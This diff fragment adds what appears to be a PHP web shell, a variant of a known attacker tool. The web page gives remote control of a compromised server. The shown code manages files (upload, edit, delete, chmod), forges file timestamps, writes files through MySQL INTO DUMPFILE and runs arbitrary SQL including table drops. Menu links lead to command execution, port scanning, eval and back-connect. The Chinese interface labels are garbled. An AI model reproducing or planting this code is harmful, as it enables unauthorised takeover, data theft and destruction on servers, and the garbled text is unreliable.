+	if (m && !confirm(m)) {
+		return;
+	}
+	$('filelist').doing.value=doing;
+	if (thefile){
+		$('filelist').thefile.value=thefile;
+	}
+	$('filelist').submit();
+}
+function createfile(nowpath){
+	var filename;
+	filename = prompt('Please input the file name:', '');
+	if (!filename) return;
+	opfile('editfile',nowpath + filename,nowpath);
+}
+function opfile(action,opfile,dir){
+	$('fileopform').action.value=action;
+	$('fileopform').opfile.value=opfile;
+	$('fileopform').dir.value=dir;
+	$('fileopform').submit();
+}
+function godir(dir,view_writable){
+	if (view_writable) {
+		$('godir').view_writable.value=view_writable;
+	}
+	$('godir').dir.value=dir;
+	$('godir').submit();
+}
+function getsize(getdir,dir){
+	$('getsize').getdir.value=getdir;
+	$('getsize').dir.value=dir;
+	$('getsize').submit();
+}
+function editrecord(action, base64, tablename){
+	if (action == 'del') {		
+		if (!confirm('Is or isn\'t deletion record?')) return;
+	}
+	$('recordlist').doing.value=action;
+	$('recordlist').base64.value=base64;
+	$('recordlist').tablename.value=tablename;
+	$('recordlist').submit();
+}
+function moddbname(dbname) {
+	if(!dbname) return;
+	$('setdbname').dbname.value=dbname;
+	$('setdbname').submit();
+}
+function settable(tablename,doing,page) {
+	if(!tablename) return;
+	if (doing) {
+		$('settable').doing.value=doing;
+	}
+	if (page) {
+		$('settable').page.value=page;
+	}
+	$('settable').tablename.value=tablename;
+	$('settable').submit();
+}
+function s(action,nowpath,p1,p2,p3,p4,p5) {
+	if(action) $('opform').action.value=action;
+	if(nowpath) $('opform').nowpath.value=nowpath;
+	if(p1) $('opform').p1.value=p1;
+	if(p2) $('opform').p2.value=p2;
+	if(p3) $('opform').p3.value=p3;
+	if(p4) $('opform').p4.value=p4;
+	if(p5) $('opform').p4.value=p5;
+}
+function g(action,nowpath,p1,p2,p3,p4,p5) {
+	if(!action) return;
+	s(action,nowpath,p1,p2,p3,p4,p5);
+	$('opform').submit();
+}
+</script>
+</head>
+<body style="margin:0;table-layout:fixed; word-break:break-all">
+<?php
+formhead(array('name'=>'opform'));
+makehide('action', $action);
+makehide('nowpath', $nowpath);
+makehide('p1', $p1);
+makehide('p2', $p2);
+makehide('p3', $p3);
+makehide('p4', $p4);
+makehide('p5', $p5);
+formfoot();
+
+if(!function_exists('posix_getegid')) {
+	$user = @get_current_user();
+	$uid = @getmyuid();
+	$gid = @getmygid();
+	$group = "?";
+} else {
+	$uid = @posix_getpwuid(@posix_geteuid());
+	$gid = @posix_getgrgid(@posix_getegid());
+	$user = $uid['name'];
+	$uid = $uid['uid'];
+	$group = $gid['name'];
+	$gid = $gid['gid'];
+}
+
+?>
+<table width="100%" border="0" cellpadding="0" cellspacing="0">
+	<tr class="head">
+		<td><span style="float:right;"><?php echo @php_uname();?> / User:<?php echo $uid.' ( '.$user.' ) / Group: '.$gid.' ( '.$group.' )';?></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
+	</tr>
+	<tr class="alt1">
+		<td>
+			<span style="float:right;">PHP <?php echo PHP_VERSION;?> / Safe Mode:<?php echo getcfg('safe_mode');?></span>
+			<a href="javascript:g('logout');">�˳���½</a> | 
+			<a href="javascript:g('file');">�ļ�����</a> | 
+			<a href="javascript:g('mysqladmin');">MYSQL����</a> | 
+			<a href="javascript:g('sqlfile');">MySQL�ϴ�����</a> | 
+			<a href="javascript:g('shell');">����ִ��</a> | 
+			<a href="javascript:g('phpenv');">PHP����</a> | 
+			<a href="javascript:g('portscan');">�˿�ɨ��</a> | 
+			<a href="javascript:g('secinfo');">��ȫ��Ϣ</a> | 
+			<a href="javascript:g('eval');">Eval PHP����</a>
+			<?php if (!IS_WIN) {?> | <a href="javascript:g('backconnect');">Back Connect</a><?php }?>
+		</td>
+	</tr>
+</table>
+<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
+<?php
+$errmsg && m($errmsg);
+
+// ��ȡ��ǰ·��
+if (!$dir) {
+	$dir = $_SERVER["DOCUMENT_ROOT"] ? $_SERVER["DOCUMENT_ROOT"] : '.';
+}
+$nowpath = getPath(SA_ROOT, $dir);
+if (substr($dir, -1) != '/') {
+	$dir = $dir.'/';
+}
+
+if ($action == 'file') {
+
+	// �ж϶�д���
+	$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
+
+	// ����Ŀ¼
+	if ($newdirname) {
+		$mkdirs = $nowpath.$newdirname;
+		if (file_exists($mkdirs)) {
+			m('Directory has already existed');
+		} else {
+			m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
+			@chmod($mkdirs,0777);
+		}
+	}
+
+	// �ϴ��ļ�
+	elseif ($doupfile) {
+		m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
+	}
+
+	// �༭�ļ�
+	elseif ($editfilename && $filecontent) {
+		$fp = @fopen($editfilename,'w');
+		m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
+		@fclose($fp);
+	}
+
+	// �༭�ļ�����
+	elseif ($pfile && $newperm) {
+		if (!file_exists($pfile)) {
+			m('The original file does not exist');
+		} else {
+			$newperm = base_convert($newperm,8,10);
+			m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
+		}
+	}
+
+	// ����
+	elseif ($oldname && $newfilename) {
+		$nname = $nowpath.$newfilename;
+		if (file_exists($nname) || !file_exists($oldname)) {
+			m($nname.' has already existed or original file does not exist');
+		} else {
+			m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
+		}
+	}
+
+	// �����ļ�
+	elseif ($sname && $tofile) {
+		if (file_exists($tofile) || !file_exists($sname)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
+		}
+	}
+
+	// ��¡ʱ��
+	elseif ($curfile && $tarfile) {
+		if (!@file_exists($curfile) || !@file_exists($tarfile)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			$time = @filemtime($tarfile);
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// �Զ���ʱ��
+	elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
+		if (!@file_exists($curfile)) {
+			m(basename($curfile).' does not exist');
+		} else {
+			$time = strtotime("$year-$month-$day $hour:$minute:$second");
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// ����ɾ���ļ�
+	elseif($doing == 'delfiles') {
+		if ($dl) {
+			$dfiles='';
+			$succ = $fail = 0;
+			foreach ($dl as $filepath) {
+				if (is_dir($filepath)) {
+					if (@deltree($filepath)) {
+						$succ++;
+					} else {
+						$fail++;
+					}
+				} else {
+					if (@unlink($filepath)) {
+						$succ++;
+					} else {
+						$fail++;
+					}
+				}
+			}
+			m('Deleted folder/file have finished,choose '.count($dl).' success '.$succ.' fail '.$fail);
+		} else {
+			m('Please select folder/file(s)');
+		}
+	}
+
+	//�������
+	formhead(array('name'=>'createdir'));
+	makehide('newdirname');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileperm'));
+	makehide('newperm');
+	makehide('pfile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'copyfile'));
+	makehide('sname');
+	makehide('tofile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'rename'));
+	makehide('oldname');
+	makehide('newfilename');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileopform', 'target'=>'_blank'));
+	makehide('action');
+	makehide('opfile');
+	makehide('dir');
+	formfoot();
+	formhead(array('name'=>'getsize'));
+	makehide('getdir');
+	makehide('dir');
+	formfoot();
+
+	$free = @disk_free_space($nowpath);
+	!$free && $free = 0;
+	$all = @disk_total_space($nowpath);
+	!$all && $all = 0;
+	$used = $all-$free;
+	p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)</h2>');
+
+	$cwd_links = '';
+	$path = explode('/', $nowpath);
+	$n=count($path);
+	for($i=0;$i<$n-1;$i++) {
+		$cwd_links .= '<a href="javascript:godir(\'';
+		for($j=0;$j<=$i;$j++) {
+			$cwd_links .= $path[$j].'/';
+		}
+		$cwd_links .= '\');">'.$path[$i].'/</a>';
+	}
+
+?>
+<script type="text/javascript">
+document.onclick = shownav;
+function shownav(e){
+	var src = e?e.target:event.srcElement;
+	do{
+		if(src.id =="jumpto") {
+			$('inputnav').style.display = "";
+			$('pathnav').style.display = "none";
+			//hidenav();
+			return;
+		}
+		if(src.id =="inputnav") {
+			return;
+		}
+		src = src.parentNode;
+	}while(src.parentNode)
+
+	$('inputnav').style.display = "none";
+	$('pathnav').style.display = "";
+}
+</script>
+<div style="background:#eee;margin-bottom:10px;">
+	<table id="pathnav" width="100%" border="0" cellpadding="5" cellspacing="0">
+		<tr>
+			<td width="100%"><?php echo $cwd_links.' - '.getChmod($nowpath).' / '.getPerms($nowpath).getUser($nowpath);?> (<?php echo $dir_writeable;?>)</td>
+			<td nowrap><input class="bt" id="jumpto" name="jumpto" value="Ŀ¼��ת" type="button"></td>
+		</tr>
+	</table>
+	<table id="inputnav" width="100%" border="0" cellpadding="5" cellspacing="0" style="display:none;">
+	<form action="" method="post" id="godir" name="godir">
+		<tr>
+			<td nowrap>��ǰ·�� (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
+			<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:99%;margin:0 8px;"></td>
+			<td nowrap><input class="bt" value="GO" type="submit"></td>
+		</tr>
+	</form>
+	</table>
+<?php
+	if (IS_WIN && IS_COM) {
+		$obj = new COM('scripting.filesystemobject');
+		if ($obj && is_object($obj) && $obj->Drives) {
+			echo '<div class="drives">';
+			$DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
+			$comma = '';
+			foreach($obj->Drives as $drive) {
+				if ($drive->Path) {
+					p($comma.'<a href="javascript:godir(\''.$drive->Path.'/\');">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
+					$comma = '<span>|</span>';
+				}
+			}
+			echo '</div>';
+		}
+	}
+?>
+</div>
+<?php
+	$findstr = $_POST['findstr'];
+	$re = $_POST['re'];
+	tbhead();
+	p('<tr class="alt1"><td colspan="7" style="padding:5px;line-height:20px;">');
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$nowpath.'" type="hidden" /><input name="dir" value="'.$nowpath.'" type="hidden" /></div></form>');
+	p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">��վ��Ŀ¼</a>');
+	p(' | <a href="javascript:godir(\'.\');">����Ŀ¼</a>');
+	p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
+	p(' | View Writable ( <a href="javascript:godir(\''.$nowpath.'\',\'dir\');">Directory</a>');
+	p(' | <a href="javascript:godir(\''.$nowpath.'\',\'file\');">File</a> )');
+	p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">�½��ļ�</a>');
+
+	p('<div style="padding:5px 0;"><form action="'.$self.'" method="POST">Find string in files(current folder): <input class="input" name="findstr" value="'.$findstr.'" type="text" /> <input class="bt" value="Find" type="submit" /> Type: <input class="input" name="writabledb" value="'.$writabledb.'" type="text" /><input name="dir" value="'.$dir.'" type="hidden" /> <input name="re" value="1" type="checkbox" '.($re ? 'checked' : '').' /> Regular expressions</form></div></td></tr>');
+
+	p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
+
+	//�鿴���п�д�ļ���Ŀ¼
+	$dirdata=array();
+	$filedata=array();
+
+	if ($view_writable == 'dir') {
+		$dirdata = GetWDirList($nowpath);
+		$filedata = array();
+	} elseif ($view_writable == 'file') {
+		$dirdata = array();
+		$filedata = GetWFileList($nowpath);
+	} elseif ($findstr) {
+		$dirdata = array();
+		$filedata = GetSFileList($nowpath, $findstr, $re);
+	} else {
+		// Ŀ¼�б�
+		//scandir()Ч�ʸ���
+		$dirs=@opendir($dir);
+		while ($file=@readdir($dirs)) {
+			$filepath=$nowpath.$file;
+			if(@is_dir($filepath)){
+				$dirdb['filename']=$file;
+				$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$dirdb['dirchmod']=getChmod($filepath);
+				$dirdb['dirperm']=getPerms($filepath);
+				$dirdb['fileowner']=getUser($filepath);
+				$dirdb['dirlink']=$nowpath;
+				$dirdb['server_link']=$filepath;
+				$dirdata[]=$dirdb;
+			} else {		
+				$filedb['filename']=$file;
+				$filedb['size']=sizecount(@filesize($filepath));
+				$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$filedb['filechmod']=getChmod($filepath);
+				$filedb['fileperm']=getPerms($filepath);
+				$filedb['fileowner']=getUser($filepath);
+				$filedb['dirlink']=$nowpath;
+				$filedb['server_link']=$filepath;
+				$filedata[]=$filedb;
+			}
+		}// while
+		unset($dirdb);
+		unset($filedb);
+		@closedir($dirs);
+	}
+	@sort($dirdata);
+	@sort($filedata);
+	$dir_i = '0';
+
+	p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
+	makehide('action','file');
+	makehide('thefile');
+	makehide('doing');
+	makehide('dir',$nowpath);
+
+	foreach($dirdata as $key => $dirdb){
+		if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
+			if($getdir && $getdir == $dirdb['server_link']) {
+				$attachsize = dirsize($dirdb['server_link']);
+				$attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
+			} else {
+				$attachsize = '<a href="javascript:getsize(\''.$dirdb['server_link'].'\',\''.$dir.'\');">Stat</a>';
+			}
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$dirdb['server_link'].'"></td>');
+			p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
+			p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$dirdb['server_link'].'\',\''.$dirdb['dirlink'].'\');">'.$dirdb['mtime'].'</a></td>');
+			p('<td nowrap>'.$attachsize.'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
+			p('<td nowrap><a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
+			p('</tr>');
+			$dir_i++;
+		} else {
+			if($dirdb['filename']=='..') {
+				p('<tr class='.bg().'>');
+				p('<td align="center">-</td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
+				p('</tr>');
+			}
+		}
+	}
+
+	p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
+	$file_i = '0';
+
+	foreach($filedata as $key => $filedb){
+		if($filedb['filename']!='..' && $filedb['filename']!='.') {
+			$fileurl = str_replace($_SERVER["DOCUMENT_ROOT"],'',$filedb['server_link']);
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$filedb['server_link'].'"></td>');
+			p('<td>'.((strpos($filedb['server_link'], $_SERVER["DOCUMENT_ROOT"]) !== false) ? '<a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a>' : $filedb['filename']).'</td>');
+			p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">'.$filedb['mtime'].'</a></td>');
+			p('<td nowrap>'.$filedb['size'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
+			p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
+			p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
+			p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a>');
+			p('</td></tr>');
+			$file_i++;
+		}
+	}
+	p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
+	p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td colspan="4"><a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
+	p('</form></table>');
+}// end dir
+
+elseif ($action == 'sqlfile') {
+	if($doing=="mysqlupload"){
+		$file = $_FILES['uploadfile'];
+		$filename = $file['tmp_name'];
+		if (file_exists($savepath)) {
+			m('The goal file has already existed');
+		} else {
+			if(!$filename) {
+				m('Please choose a file');
+			} else {
+				$fp=@fopen($filename,'r');
+				$contents=@fread($fp, filesize($filename));
+				@fclose($fp);
+				$contents = bin2hex($contents);
+				if(!$upname) $upname = $file['name'];
+				mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+				$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
+				m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
+			}
+		}
+	}
+?>
+<script type="text/javascript">
+function mysqlfile(doing){
+	if(!doing) return;
+	$('doing').value=doing;
+	$('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
+	$('mysqlfile').dbport.value=$('dbinfo').dbport.value;
+	$('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
+	$('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
+	$('mysqlfile').dbname.value=$('dbinfo').dbname.value;
+	$('mysqlfile').charset.value=$('dbinfo').charset.value;
+	$('mysqlfile').submit();
+}
+</script>
+<?php
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'root';
+	!$dbport && $dbport = '3306';
+	formhead(array('title'=>'MYSQL Info','name'=>'dbinfo'));
+	makehide('action','sqlfile');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p(':');
+	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	p('DBName:');
+	makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
+	p('DBCharset:');
+	makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
+	p('</p>');
+	formfoot();
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
+	p('<h2>Upload file</h2>');
+	p('<p><b>This operation the DB user must has FILE privilege</b></p>');
+	p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
+	p('<h2>Download file</h2>');
+	p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
+	makehide('dbhost');
+	makehide('dbport');
+	makehide('dbuser');
+	makehide('dbpass');
+	makehide('dbname');
+	makehide('charset');
+	makehide('doing');
+	makehide('action','sqlfile');
+	p('</form>');
+}
+
+elseif ($action == 'mysqladmin') {
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'root';
+	!$dbport && $dbport = '3306';
+	$dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
+	if(isset($dbhost)){
+		$dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
+	}
+	if(isset($dbuser)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
+	}
+	if(isset($dbpass)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
+	}
+	if(isset($dbport)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
+	}
+	if(isset($dbname)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
+	}
+	if(isset($charset)) {
+		$dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
+	}
+
+	if ($doing == 'backupmysql' && $saveasfile) {
+		if (!$table) {
+			m('Please choose the table');
+		} else {
+			mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			$fp = @fopen($path,'w');
+			if ($fp) {
+				foreach($table as $k => $v) {
+					if ($v) {
+						sqldumptable($v, $fp);
+					}
+				}
+				fclose($fp);				
+				$fileurl = str_replace(SA_ROOT,'',$path);
+				m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
+				mysql_close();
+			} else {
+				m('Backup failed');
+			}
+		}
+	}
+	if ($insert && $insertsql) {
+		$keystr = $valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			if ($val) {
+				$keystr .= $tmp.$key;
+				$valstr .= $tmp."'".addslashes($val)."'";
+				$tmp = ',';
+			}
+		}
+		if ($keystr && $valstr) {
+			mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
+		}
+	}
+	if ($update && $insertsql && $base64) {
+		$valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			$valstr .= $tmp.$key."='".addslashes($val)."'";
+			$tmp = ',';
+		}
+		if ($valstr) {
+			$where = base64_decode($base64);
+			mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
+		}
+	}
+	if ($doing == 'del' && $base64) {
+		$where = base64_decode($base64);
+		$delete_sql = "DELETE FROM $tablename WHERE $where";
+		mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+		m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
+	}
+
+	if ($tablename && $doing == 'drop') {
+		mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+		if (q("DROP TABLE $tablename")) {
+			m('Drop table of success');
+			$tablename = '';
+		} else {
+			m(mysql_error());
+		}
+	}
+
+	formhead(array('title'=>'MYSQL Manager'));
+	makehide('action','mysqladmin');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p(':');
+	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	p('DBCharset:');
+	makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
+	makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+
+	//������¼
+	formhead(array('name'=>'recordlist'));
+	makehide('doing');
+	makehide('action','mysqladmin');
+	makehide('base64');
+	makehide('tablename');
+	p($dbform);
+	formfoot();
+
+	//ѡ�����ݿ�
+	formhead(array('name'=>'setdbname'));
+	makehide('action','mysqladmin');
+	p($dbform);
+	if (!$dbname) {
+		makehide('dbname');
+	}
+	formfoot();
+
+	//ѡ����
+	formhead(array('name'=>'settable'));
+	makehide('action','mysqladmin');
+	p($dbform);
+	makehide('tablename');
+	makehide('page',$page);
+	makehide('doing');
+	formfoot();
+
+	$cachetables = array();	
+	$pagenum = 30;
+	$page = intval($page);
+	if($page) {
+		$start_limit = ($page - 1) * $pagenum;
+	} else {
+		$start_limit = 0;
+		$page = 1;
+	}
+	if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
+		mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		//��ȡ���ݿ���Ϣ
+		$mysqlver = mysql_get_server_info();
+		p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
+		$highver = $mysqlver > '4.1' ? 1 : 0;
+
+		//��ȡ���ݿ�
+		$query = q("SHOW DATABASES");
+		$dbs = array();
+		$dbs[] = '-- Select a database --';
+		while($db = mysql_fetch_array($query)) {
+			$dbs[$db['Database']] = $db['Database'];
+		}
+		makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
+		$tabledb = array();
+		if ($dbname) {
+			p('<p>');
+			p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
+			if ($tablename) {
+				p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
+			}
+			p('</p>');
+			mysql_select_db($dbname);
+
+			$getnumsql = '';
+			$runquery = 0;
+			if ($sql_query) {
+				$runquery = 1;
+			}
+			$allowedit = 0;
+			if ($tablename && !$sql_query) {
+				$sql_query = "SELECT * FROM $tablename";
+				$getnumsql = $sql_query;
+				$sql_query = $sql_query." LIMIT $start_limit, $pagenum";
+				$allowedit = 1;
+			}
+			p('<form action="'.$self.'" method="POST">');
+			p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
+			makehide('tablename', $tablename);
+			makehide('action','mysqladmin');
+			p($dbform);
+			p('</form>');
+			if ($tablename || ($runquery && $sql_query)) {
+				if ($doing == 'structure') {
+					$result = q("SHOW FULL COLUMNS FROM $tablename");
+					$rowdb = array();
+					while($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					p('<h3>Structure</h3>');
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					p('<tr class="head">');
+					p('<td>Field</td>');
+					p('<td>Type</td>');
+					p('<td>Collation</td>');
+					p('<td>Null</td>');
+					p('<td>Key</td>');
+					p('<td>Default</td>');
+					p('<td>Extra</td>');
+					p('<td>Privileges</td>');
+					p('<td>Comment</td>');
+					p('</tr>');
+					foreach ($rowdb as $row) {
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td>'.$row['Field'].'</td>');
+						p('<td>'.$row['Type'].'</td>');
+						p('<td>'.$row['Collation'].'&nbsp;</td>');
+						p('<td>'.$row['Null'].'&nbsp;</td>');
+						p('<td>'.$row['Key'].'&nbsp;</td>');
+						p('<td>'.$row['Default'].'&nbsp;</td>');
+						p('<td>'.$row['Extra'].'&nbsp;</td>');
+						p('<td>'.$row['Privileges'].'&nbsp;</td>');
+						p('<td>'.$row['Comment'].'&nbsp;</td>');
+						p('</tr>');
+					}
+					tbfoot();
+					$result = q("SHOW INDEX FROM $tablename");
+					$rowdb = array();
+					while($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					p('<h3>Indexes</h3>');
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					p('<tr class="head">');
+					p('<td>Keyname</td>');
+					p('<td>Type</td>');
+					p('<td>Unique</td>');
+					p('<td>Packed</td>');
+					p('<td>Seq_in_index</td>');
+					p('<td>Field</td>');
+					p('<td>Cardinality</td>');
+					p('<td>Collation</td>');
+					p('<td>Null</td>');
+					p('<td>Comment</td>');
+					p('</tr>');
+					foreach ($rowdb as $row) {
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td>'.$row['Key_name'].'</td>');
+						p('<td>'.$row['Index_type'].'</td>');
+						p('<td>'.($row['Non_unique'] ? 'No' : 'Yes').'&nbsp;</td>');
